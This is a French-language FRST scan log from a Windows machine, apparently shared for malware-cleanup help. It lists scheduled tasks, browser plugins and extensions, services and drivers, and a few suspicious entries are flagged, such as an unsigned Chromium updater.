Task: {7D25FE2B-C52A-41CD-B6CA-16020D04EDD3} - System32\Tasks\Opera GX scheduled Autoupdate 1641416756 => C:\Users\tibur\AppData\Local\Programs\Opera GX\launcher.exe [2192592 2021-12-22] (Opera Software AS -> Opera Software)
Task: {81C00D5F-8AE1-49CA-8E84-92865D9C1603} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905072 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {83bbf89c-15ab-47d8-b9d7-214bd40da306} - pas de chemin du fichier
Task: {84F6B699-4A33-4C2F-AA59-0FBA0D2B4916} - System32\Tasks\iTop Screen Recorder Update => C:\Program Files (x86)\iTop Screen Recorder\AutoUpdate.exe /auto (Pas de fichier)
Task: {878669a4-82de-4895-a60c-2de92613de8a} - pas de chemin du fichier
Task: {87B6CB79-3E75-4E41-8475-E1CF3BD6E4E3} - System32\Tasks\iTop Screen Recorder SkipUAC (tibur) => C:\Program Files (x86)\iTop Screen Recorder\IScrRec.exe /skipuac (Pas de fichier)
Task: {89A65A49-FF58-453C-9771-207F3BE5749F} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2110.6-0\MpCmdRun.exe [901056 2021-11-06] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9151416B-3700-4E80-B02A-DEC3B7F1B1E4} - System32\Tasks\ChromiumUpdateTaskUserS-1-5-21-3716561713-2104721246-2030872134-1001UA => C:\Users\tibur\AppData\Local\Chromium\Update\ChromiumUpdate.exe [100352 2021-01-21] (Chromium.) [Fichier non signé] <==== ATTENTION
Task: {9272455d-97be-4f3c-b3cf-6b85185ec08f} - pas de chemin du fichier
Task: {9407CEA8-E4E5-4BEA-9B80-BB7D115F92DD} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [903024 2021-05-04] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {95843F95-BDD7-43C6-90A7-92DBBBBBAC1E} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22655904 2021-10-25] (Microsoft Corporation -> Microsoft Corporation)
Task: {975B3503-C724-443A-A8B3-F75B239BCBF7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-08-30] (Google LLC -> Google LLC)
Task: {975cb8e3-3360-446b-8475-13d107b91a3d} - pas de chemin du fichier
Task: {9788F969-7F61-42C7-A1DC-19E5CDB61C19} - System32\Tasks\Driver Booster SkipUAC (tibur) => C:\Program Files (x86)\IObit\Driver Booster\9.0.1\DriverBooster.exe /skipuac (Pas de fichier)
Task: {98366C45-7295-4DD4-AFDD-273702245167} - System32\Tasks\OmApSvcBroker => C:\Program Files (x86)\MSI\MSI NBFoundation Service\OmApSvcBroker.exe [984696 2020-01-10] (Micro-Star International CO., LTD. -> Micro-Star International Co., Ltd.)
Task: {9a1956e5-da63-48f8-b45d-b1c0cc306386} - pas de chemin du fichier
Task: {9F829F42-3CDC-4DCB-8EC6-0546BEF2B094} - System32\Tasks\OneDC_Updater => C:\Users\tibur\Documents\temp\OneDC_Updater\OneDC_Updater.exe [720504 2020-01-20] (Micro-Star International CO., LTD. -> Micro-Star International Co., Ltd.) <==== ATTENTION
Task: {A0F08F0F-74E8-4FE3-A4E3-6E1F98581174} - System32\Tasks\iTop Screenshot Startup => C:\Program Files (x86)\iTop Screenshot\iScrShot.exe /autorun (Pas de fichier)
Task: {A1EB45A5-195C-4950-94B1-15C9B698252D} - System32\Tasks\NahimicSvc32Run => C:\Windows\SysWOW64\NahimicSvc32.exe [829568 2021-05-27] (A-Volute SAS -> Nahimic)
Task: {A664B795-045E-481B-AFBF-BE3EFF68C0D0} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22655904 2021-10-25] (Microsoft Corporation -> Microsoft Corporation)
Task: {A7026A80-1098-401A-A332-09F9CB9854EC} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {AA93F8A3-86D7-462A-9B43-230C9F7493DA} - System32\Tasks\Norton WSC Integration => C:\Program Files\Norton Security\Engine\22.21.11.46\WSCStub.exe [646520 2021-12-13] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
Task: {AAFA5192-0B1E-4624-BF0A-0091B1F38DF2} - System32\Tasks\MSI Task Host - Detect_Monitor => C:\Program Files (x86)\MSI\One Dragon Center\MSI.NotifyServer.exe [74384 2020-09-24] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.)
Task: {AC71DFA6-943C-43A9-B1F7-93BC4BA57D15} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2484056 2021-12-15] (Overwolf Ltd -> Overwolf LTD)
Task: {b3b01422-0b36-4fc6-8738-bc19b11bdbbe} - pas de chemin du fichier
Task: {B943186E-C35A-43E1-B792-2C5F526950D4} - System32\Tasks\MSI Task Host - DisplayID => C:\Program Files (x86)\MSI\One Dragon Center\MSI.NotifyServer.exe [74384 2020-09-24] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.)
Task: {bdaeafb8-981f-4021-8e29-d49f455850ec} - pas de chemin du fichier
Task: {BEA8E94A-5026-41D5-AADA-41EFEFAED6BF} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\9.0.1\Scheduler.exe /scheduler (Pas de fichier)
Task: {C45D1BBC-F343-4410-B2BC-93B88C25EF60} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2110.6-0\MpCmdRun.exe [901056 2021-11-06] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C4C154E7-15F9-4558-84CB-1564A1E5E1E0} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2110.6-0\MpCmdRun.exe [901056 2021-11-06] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {c4cdf14a-efb9-46ab-8114-848e4009b327} - pas de chemin du fichier
Task: {c7a5b2da-75aa-4bfb-925a-c6cc3c517829} - pas de chemin du fichier
Task: {C7FA37BC-F572-4A40-BCC1-1B8CCEE27E14} - System32\Tasks\iTop Screen Recorder UAC => C:\Program Files (x86)\iTop Screen Recorder\iScrInit.exe /UAC (Pas de fichier)
Task: {c92080c9-1e5c-400e-90fd-1fdafb48ba66} - pas de chemin du fichier
Task: {CAD1DE85-0D98-4E39-A4F8-2EB152F992AC} - System32\Tasks\NahimicTask32 => C:\WINDOWS\system32\..\SysWOW64\NahimicSvc32.exe [829568 2021-05-27] (A-Volute SAS -> Nahimic)
Task: {cb03076e-7ac5-4e53-a829-6d98f1220db7} - pas de chemin du fichier
Task: {cefb7d27-b286-48b6-abd9-9fb1a6317f7c} - pas de chemin du fichier
Task: {D041CD90-B56B-4FD4-A5D4-F0B4547705B4} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [138600 2021-11-01] (Microsoft Corporation -> Microsoft Corporation)
Task: {D65A1A49-91D6-4A27-AEE4-F6F7CDF13549} - System32\Tasks\iTopVPN_SkipUAC_tibur => C:\Program Files (x86)\iTop VPN\iTopVPN.exe /SkipUac (Pas de fichier)
Task: {d7c894d0-ee26-4f37-80e7-a5a8778644c5} - pas de chemin du fichier
Task: {e39afacb-dc89-442e-bbbf-2706a139d103} - pas de chemin du fichier
Task: {E39B2144-8B1A-4070-8541-6BA89E66FB08} - System32\Tasks\NahimicTask64 => C:\WINDOWS\system32\.\NahimicSvc64.exe [1088640 2021-05-27] (A-Volute SAS -> Nahimic)
Task: {E68AD3AB-1C5C-49F9-ACF1-91EF9043B97B} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {e9e342a0-f872-46e9-81b3-ddcdb373b7cb} - pas de chemin du fichier
Task: {EE06BBAD-18A5-4C6D-A81E-79B4B9E57D54} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {eebab7aa-df46-4f8b-b2fe-69832d49d5f1} - pas de chemin du fichier
Task: {eff8dd23-ea3f-4ea0-b339-f86e6d5603be} - pas de chemin du fichier
Task: {F39BEAF6-8D93-4B18-9228-414A2A5F9468} - System32\Tasks\iTopVPN_Update_tibur => C:\Program Files (x86)\iTop VPN\atud.exe /auto (Pas de fichier)
Task: {F9633385-D7AC-4EE1-B8C2-1F890BA80024} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905072 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {FF26BE64-213D-4CBE-AF1A-94DFD067BDE6} - System32\Tasks\Norton Security\Norton Security Autofix => C:\Program Files\Norton Security\Engine\22.21.11.46\SymErr.exe [108752 2021-12-13] (NortonLifeLock Inc. -> NortonLifeLock Inc)

(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)

Task: C:\WINDOWS\Tasks\MSILEDKeeper2_Host.job => C:\Program Files (x86)\MSI\One Dragon Center\Mystic_Light\LEDKeeper2.exe
Task: C:\WINDOWS\Tasks\MSISW_Host.job => C:\WINDOWS\SysWOW64\muachost.exe

==================== Internet (Avec liste blanche) ====================

(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)

Tcpip\Parameters: [DhcpNameServer] 192.168.77.97
Tcpip\..\Interfaces\{49b583f1-1a4c-40c3-a7d3-153a58fc4a8e}: [DhcpNameServer] 192.168.250.1 1.1.1.3
Tcpip\..\Interfaces\{b3d72db1-dba7-4594-a4e6-265ee19aca35}: [DhcpNameServer] 192.168.77.97

Edge:
=======
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
Edge Profile: C:\Users\tibur\AppData\Local\Microsoft\Edge\User Data\Default [2021-10-09]

FireFox:
========
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2021-11-01] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.261.2 -> C:\Program Files (x86)\Java\jre1.8.0_261\bin\dtplugin\npDeployJava1.dll [2020-09-06] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.261.2 -> C:\Program Files (x86)\Java\jre1.8.0_261\bin\plugin2\npjp2.dll [2020-09-06] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2021-11-01] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin HKU\S-1-5-21-3716561713-2104721246-2030872134-1001: @ChUpdateApplication.com/Chromium Update;version=3 -> C:\Users\tibur\AppData\Local\Chromium\Update\1.3.99.0\npChromiumUpdate3.dll [2021-01-21] (Chromium.) [Fichier non signé]
FF Plugin HKU\S-1-5-21-3716561713-2104721246-2030872134-1001: @ChUpdateApplication.com/Chromium Update;version=9 -> C:\Users\tibur\AppData\Local\Chromium\Update\1.3.99.0\npChromiumUpdate3.dll [2021-01-21] (Chromium.) [Fichier non signé]

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default [2022-01-06]
CHR Notifications: Default -> hxxps://b.captchatopsource.com; hxxps://linkvertise.com; hxxps://meet.google.com; hxxps://www.op.gg
CHR Session Restore: Default -> est activé.
CHR Extension: (Google Traduction) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2021-08-16]
CHR Extension: (Slides) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-09-04]
CHR Extension: (Magic Actions for YouTube™) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\abjcfabbhafbcdfjoecdgepllmpfceif [2021-05-05]
CHR Extension: (Docs) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-09-04]
CHR Extension: (Google Drive) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-10-21]
CHR Extension: (Turn Off the Lights) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfbmjmiodbnnpllbbbfblcplfjjepjdn [2021-03-31]
CHR Extension: (YouTube) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-09-04]
CHR Extension: (FrankerFaceZ) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\fadndhdgpmmaapbmfcknlfgcflmmmieb [2021-08-30]
CHR Extension: (Sheets) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-09-04]
CHR Extension: (Stylish – Thèmes personnalisés pour sites Web) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjnbnpbmkenffdnngjfgmeleoegfcffe [2020-09-12]
CHR Extension: (Google Docs hors connexion) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-12-11]
CHR Extension: (AdBlock — le meilleur bloqueur de pubs) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2022-01-05]
CHR Extension: (Naruto Uzumaki [LSP]) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjnnlamicjhgpgkdgcccmaedniogiall [2020-09-04]
CHR Extension: (Web Safety) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfhcmdonhekjhfbjmeacdjbhlfgpjabp [2021-08-08]
CHR Extension: (Netflix Party) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\mmnbenehknklpbendgmgngeaignppnbe [2021-12-11]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-30]
CHR Extension: (hide.me Proxy) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohjocgmpmlfahafbipehkhbaacoemojp [2021-02-17]
CHR Extension: (Gmail) - C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-23]
CHR Profile: C:\Users\tibur\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-08-09]
CHR Profile: C:\Users\tibur\AppData\Local\Google\Chrome\User Data\System Profile [2021-08-09]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]
CHR HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jdanfkhnfpagoijgfmklhgakdicpnfil]
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]
CHR HKLM-x32\...\Chrome\Extension: [mfhcmdonhekjhfbjmeacdjbhlfgpjabp]

Opera:
=======
StartMenuInternet: (HKU\S-1-5-21-3716561713-2104721246-2030872134-1001) Opera GXStable - "C:\Users\tibur\AppData\Local\Programs\Opera GX\Launcher.exe"

==================== Services (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8912272 2021-09-10] (BattlEye Innovations e.K. -> )
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [12034464 2021-10-12] (Microsoft Corporation -> Microsoft Corporation)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [810928 2021-11-26] (EasyAntiCheat Oy -> Epic Games, Inc)
R2 Hamachi2Svc; C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe [3361736 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
R2 LGHUBUpdaterService; C:\Program Files\LGHUB\lghub_updater.exe [11104832 2021-12-08] (Logitech Inc -> Logitech, Inc.)
R2 LightKeeperService; C:\Program Files (x86)\MSI\One Dragon Center\Mystic_Light\LightKeeperService.exe [83600 2020-01-07] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe [419248 2016-05-27] (LogMeIn, Inc. -> LogMeIn, Inc.)
R2 ManyCam Service; C:\ProgramData\ManyCam\Service\ManyCamService.exe [544984 2016-03-31] (ManyCam -> Visicom Media Inc.)
R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [971504 2021-12-17] (McAfee, LLC -> McAfee, LLC)
R2 Micro Star SCM; C:\Windows\SysWOW64\MSIService.exe [160768 2009-07-09] (Micro-Star International Co., Ltd.) [Fichier non signé]
R2 MSI Foundation Service; C:\Program Files (x86)\MSI\MSI NBFoundation Service\MSIAPService.exe [58832 2019-12-05] (Micro-Star International CO., LTD. -> Micro-Star International Co., Ltd.)
R2 MSI_Central_Service; C:\Program Files (x86)\MSI\One Dragon Center\MSI_Central_Service.exe [147088 2020-07-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.)
R2 Mystic_Light_Service; C:\Program Files (x86)\MSI\One Dragon Center\Mystic_Light\Mystic_Light_Service.exe [34992 2019-11-13] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.)
R2 NahimicService; C:\WINDOWS\system32\NahimicService.exe [1675392 2021-05-27] (A-Volute SAS -> Nahimic)
R2 nordvpn-service; C:\Program Files\NordVPN\nordvpn-service.exe [275200 2020-10-16] (TEFINCOM S.A. -> TEFINCOM S.A.)
R2 NortonSecurity; C:\Program Files\Norton Security\Engine\22.21.11.46\NortonSecurity.exe [343336 2021-12-13] (NortonLifeLock Inc. -> Broadcom)
R2 nsWscSvc; C:\Program Files\Norton Security\Engine\22.21.11.46\nsWscSvc.exe [1059176 2021-12-13] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
S3 OverwolfUpdater; C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2484056 2021-12-15] (Overwolf Ltd -> Overwolf LTD)
R2 OVRService; C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe [511736 2021-12-03] (Oculus VR, LLC -> Facebook Technologies, LLC)
R2 PnkBstrA; C:\WINDOWS\SysWOW64\PnkBstrA.exe [76888 2021-09-10] (Even Balance, Inc. -> )
S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [2020144 2021-09-16] (Rockstar Games, Inc. -> Rockstar Games)
R2 Sendevsvc; C:\Program Files (x86)\MSI\MSI NBFoundation Service\Sendevsvc.exe [306808 2019-05-07] (Micro-Star International CO., LTD. -> )
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13273104 2020-10-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10429808 2021-11-30] (Riot Games, Inc. -> Riot Games, Inc.)
R2 VoiceControlService; C:\Program Files (x86)\MSI\One Dragon Center\VoiceControl\VoiceControl_Service.exe [32400 2020-07-06] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 WCAssistantService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe [28136 2021-03-05] (LAVASOFT SOFTWARE CANADA INC -> )
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2110.6-0\NisSrv.exe [2872024 2021-11-06] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2110.6-0\MsMpEng.exe [128376 2021-11-06] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nvmisi.inf_amd64_a3dd6a592ee7bee7\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nvmisi.inf_amd64_a3dd6a592ee7bee7\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem
S3 OVRLibraryService; "C:\Program Files\Oculus\Support\oculus-librarian\OVRLibraryService.exe" [X]

===================== Pilotes (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

R1 BHDrvx64; C:\Program Files\Norton Security\NortonData\22.19.8.65\Definitions\BASHDefs\20201215.001\BHDrvx64.sys [1991536 2020-11-19] (Symantec Corporation -> Broadcom)
R2 BlueStacksDrv_msi2; C:\Program Files\BlueStacks_msi2\BstkDrv_msi2.sys [315768 2019-12-12] (Bluestack Systems, Inc -> Bluestack System Inc.)
R1 ccSet_NGC; C:\WINDOWS\System32\drivers\NGCx64\16150B0.02E\ccSetx64.sys [192256 2021-12-13] (Symantec Corporation -> Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [516960 2020-09-04] (Symantec Corporation -> Broadcom)
R1 EneTechIo; C:\Windows\system32\drivers\ene.sys [19968 2019-10-17] (Microsoft Windows Hardware Compatibility Publisher -> )
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [154464 2020-09-04] (Symantec Corporation -> Broadcom)
S3 Hamachi; C:\WINDOWS\System32\drivers\Hamdrv.sys [45680 2019-04-02] (Microsoft Windows Hardware Compatibility Publisher -> LogMeIn Inc.)
R1 IDSVia64; C:\Program Files\Norton Security\NortonData\22.19.8.65\Definitions\IPSDefs\20201231.061\IDSvia64.sys [1478496 2020-11-23] (Symantec Corporation -> Broadcom)
S3 logi_audio_surround; C:\WINDOWS\system32\drivers\logi_audio_surround.sys [43856 2021-03-26] (Logitech Inc -> Logitech)
R3 logi_joy_bus_enum; C:\WINDOWS\system32\drivers\logi_joy_bus_enum.sys [37200 2021-03-26] (Logitech Inc -> Logitech)
R3 logi_joy_vir_hid; C:\WINDOWS\system32\drivers\logi_joy_vir_hid.sys [25928 2021-03-26] (Logitech Inc -> Logitech)
R3 logi_joy_xlcore; C:\WINDOWS\system32\drivers\logi_joy_xlcore.sys [66896 2021-03-26] (Logitech Inc -> Logitech)
R3 ManyCam; C:\WINDOWS\system32\DRIVERS\mcvidrv.sys [66952 2018-07-29] (ManyCam (VISICOM MÉDIA INC.) -> Visicom Media Inc.)
R3 mcaudrv_simple; C:\WINDOWS\system32\drivers\mcaudrv_x64.sys [35960 2014-12-29] (ManyCam -> Visicom Media Inc.)
S3 MpKsl47666cf8; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{6976AB3A-EEB1-41B9-B9A1-E52ABD7D14DA}\MpKslDrv.sys [130296 2021-11-14] (Microsoft Windows -> Microsoft Corporation)
S3 MpKslb21bf522; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{6976AB3A-EEB1-41B9-B9A1-E52ABD7D14DA}\MpKslDrv.sys [130296 2021-11-14] (Microsoft Windows -> Microsoft Corporation)
S3 MpKslc7f8fe52; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{6976AB3A-EEB1-41B9-B9A1-E52ABD7D14DA}\MpKslDrv.sys [130296 2021-11-14] (Microsoft Windows -> Microsoft Corporation)
R3 Nahimic_Mirroring; C:\WINDOWS\System32\drivers\Nahimic_Mirroring.sys [85592 2020-06-16] (A-Volute -> Windows (R) Win 7 DDK provider)
S3 NDivert; C:\WINDOWS\System32\drivers\NDivert.sys [105184 2021-02-01] (TEFINCOM S.A. -> )
R3 nlwt; C:\WINDOWS\system32\DRIVERS\nlwt.sys [39360 2020-12-21] (TEFINCOM S.A. -> WireGuard LLC)
R1 nordlwf; C:\WINDOWS\system32\DRIVERS\nordlwf.sys [38608 2020-10-14] (TEFINCOM S.A. -> TEFINCOM S.A.)
S3 npcap; C:\WINDOWS\system32\DRIVERS\npcap.sys [74616 2020-09-25] (Insecure.Com LLC -> Insecure.Com LLC.)
S3 nsvst_NGC; C:\WINDOWS\System32\drivers\NGCx64\16150B0.02E\nsvst.sys [56080 2021-12-13] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
R3 oculusvad_oculusvad; C:\WINDOWS\System32\drivers\oculusvad.sys [72208 2020-09-16] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
R3 Oculus_ViGEmBus; C:\WINDOWS\System32\drivers\Oculus_ViGEmBus.sys [32856 2020-09-16] (Oculus VR, LLC -> Facebook Inc.)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
R3 SRTSP; C:\WINDOWS\System32\drivers\NGCx64\16150B0.02E\SRTSP64.SYS [892600 2021-12-13] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R1 SRTSPX; C:\WINDOWS\System32\drivers\NGCx64\16150B0.02E\SRTSPX64.SYS [48824 2021-12-13] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R0 SymEFASI; C:\WINDOWS\System32\drivers\NGCx64\16150B0.02E\SYMEFASI64.SYS [2030768 2021-12-13] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S0 SymELAM; C:\WINDOWS\System32\drivers\NGCx64\16150B0.02E\SymELAM.sys [31984 2021-12-13] (Microsoft Windows Early Launch Anti-malware Publisher -> Broadcom Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [93152 2021-08-07] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R3 SymEvnt; C:\Program Files\Norton Security\NortonData\22.19.8.65\SymPlatform\SymEvnt.sys [712368 2020-02-11] (Symantec Corporation -> Symantec Corporation)
R1 SymIRON; C:\WINDOWS\System32\drivers\NGCx64\16150B0.02E\Ironx64.SYS [319152 2021-12-13] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R1 SymNetS; C:\WINDOWS\System32\drivers\NGCx64\16150B0.02E\symnets.sys [575344 2021-12-13] (Symantec Corporation -> Symantec Corporation)
R3 tapnordvpn; C:\WINDOWS\System32\drivers\tapnordvpn.sys [44896 2020-06-09] (TEFINCOM S.A. -> The OpenVPN Project)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [8480608 2021-11-29] (Riot Games, Inc. -> Riot Games, Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48520 2021-11-06] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
